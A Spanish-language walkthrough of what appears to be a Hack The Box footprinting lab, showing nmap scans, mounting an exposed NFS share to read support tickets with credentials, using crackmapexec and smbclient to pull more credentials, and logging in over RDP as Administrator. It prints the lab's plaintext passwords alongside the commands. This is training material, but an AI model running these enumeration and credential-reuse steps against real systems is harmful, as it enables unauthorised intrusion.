🟠Footprinting Lab - Medium

🧠 Contexto

Este segundo servidor 🖥️ forma parte de la red interna y todos los usuarios tienen acceso.
Los servidores de este tipo suelen ser objetivos comunes para atacantes 🎯.

El cliente aceptó incluirlo en el alcance ✅, y se creó el usuario HTB 👤 como prueba.
🔍 El objetivo es obtener sus credenciales para demostrar acceso exitoso.


🔎 Escaneo con Nmap

Para comenzar, ejecutamos un escaneo rápido y agresivo con nmap para descubrir puertos abiertos:

sudo nmap -p- --open -sS -vvv --min-rate 5000 -n -Pn 10.129.202.41 -oG networked

Tenemos los puertos 111,135,139,445,2049,3389,5985,47001,49664,49665,49666,49667,49668,49679,49680,49681
{2E1B71C9-AD2A-43B8-AF65-51F5FD0FAD45}.png

sudo nmap -sC -sV -p111,135,139,445,2049,3389,5985,47001,49664,49665,49666,49667,49668,49679,49680,49681 -n -Pn -oN script_scan.txt 10.129.202.41

🔍 Se detectan múltiples servicios expuestos:

🧠 El sistema se identifica como:
Windows 10 (10.0.17763) 🪟
Nombre de la máquina: WINMEDIUM

💡 Importante: El puerto 2049 indica que NFS está habilitado, lo cual puede ser un vector directo de acceso.


📂 Acceso al recurso NFS

Buscamos recursos compartidos vía NFS:

showmount -e 10.129.202.41 

📁 Se encuentra el recurso: /TechSupport
Lo montamos en nuestro sistema:
{D028FD55-3D68-4935-A608-F05A593899BC}.png

mkdir -p TechSupport
sudo mount -t nfs 10.129.202.41:/TechSupport ./TechSupport -o nolock

📄 Dentro hay múltiples tickets. Para leerlos:

sudo find TechSupport -type f -size +0c -exec cat {} \;

🔐 ¡Obtenemos las credenciales de acceso!
{51790CE9-78F4-40F7-944D-FD46324E190B}.png


📦 Acceso SMB

Probamos credenciales con crackmapexec

crackmapexec smb 10.129.202.41 --shares -u 'alex' -p 'lol123!mD'

📂 Acceso exitoso al recurso compartido devshare.
Usamos smbclient para conectarnos:
{32676C59-8E24-4347-AC96-557D33E16F6F}.png

smbclient -U alex \\\\10.129.202.41\\devshare
get important.txt
exit

{9E479DC6-183C-4CE2-A8F2-365653B33096}.png
📄 En el archivo important.txt encontramos nuevas credenciales:
🔑 sa:87N1ns@slls83

💻 Conexión RDP

Nos conectamos vía RDP como Administrator:

xfreerdp /v:10.129.202.41 /u:Administrator /p:'87N1ns@slls83'

✅ Acceso exitoso al escritorio remoto
{65726016-F7E9-4BA3-9887-00CE0DCA183B}.png


🛢️ SQL Server

Una vez dentro, accedemos a SQL Server usando las credenciales encontradas.
{11162F2B-55E4-44F9-8B71-8B9DDB36B02F}.png

{4EA4F04D-836E-4DBF-AAB9-53F0FB7ADF84}.png